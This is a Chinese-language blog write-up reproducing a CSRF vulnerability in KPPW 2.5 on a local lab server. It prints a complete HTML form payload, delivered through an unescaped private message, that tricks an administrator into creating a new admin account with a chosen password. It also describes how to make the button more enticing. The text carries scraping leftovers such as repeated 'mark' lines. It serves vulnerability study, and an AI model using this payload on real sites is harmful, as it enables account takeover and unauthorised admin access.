KPPW2.5 漏洞利用--CSRF

kppw2.5 CSRF漏洞復現

漏洞說明

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填目標用戶名,標題隨便,內容沒有轉義 ,因此提交內容處可能存在xss,不過過濾了敏感標籤和 onerror onload等事件。雖然不能加載js代碼,可是仍是能夠注入html代碼,能夠用xss漏洞注入html代碼觸發csrfphp

漏洞利用

http://192.168.50.157/kppw25/index.php?do=user&view=message&op=send

收件人填寫admin(網站管理員),向管理員提交私信,內容爲咱們構造的html代碼html

<form action="http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=
" method="post">
    <input type=hidden name="edituid" value="">
    <input type=hidden name="fds[username]" value="qianlan">
    <input type=hidden name="fds[truename]" value="">
    <input type=hidden name="fds[phone]" value="">
    <input type=hidden name="fds[qq]" value="">
    <input type=hidden name="fds[indus_pid]" value="">
    <input type=hidden name="fds[indus_id]" value="">
    <input type=hidden name="fds[birthday]" value="">
    <input type=hidden name="fds[password]" value="newadmin">
    <input type=hidden name="fds[email]" value="x@q.c">
    <input type=hidden name="fds[group_id]" value="1">
    <input type="submit" name="is_submit" value="1">
</form>

mark
mark

 

http://192.168.50.157/kppw25/admin/index.php?do=user&view=add&edituid=這個url是後臺管理員添加用戶的url,咱們構造表單,action的值設爲這個url,寫幾個隱藏表單誘使管理員去點擊提交,就會以管理員的身份去添加一個新的管理員,固然這不是網站管理員的意願,而是咱們的web

提交完成後退出當前網站用戶,模擬管理員登錄查看私信,能夠看到一個按鈕,單單一個按鈕,看到的人總會想着去點一下,固然這個按鈕能夠構造的更具備吸引力xss


mark
mark

當點擊按鈕事後,管理員就會在不知情的狀況下發起添加用戶的http請求去添加一個用戶名爲qianlan密碼爲newadmin的用戶,固然這是咱們構造的,看用戶列表能夠看到多了一個名爲qianlan的用戶,咱們登錄一下能夠成功進入後臺,進行下一步的滲透post

 

mark
mark
mark

 

 

 

參考連接(http://lawlietweb.com/2018/01/12/KPPW25xss/)網站

相關文章
相關標籤/搜索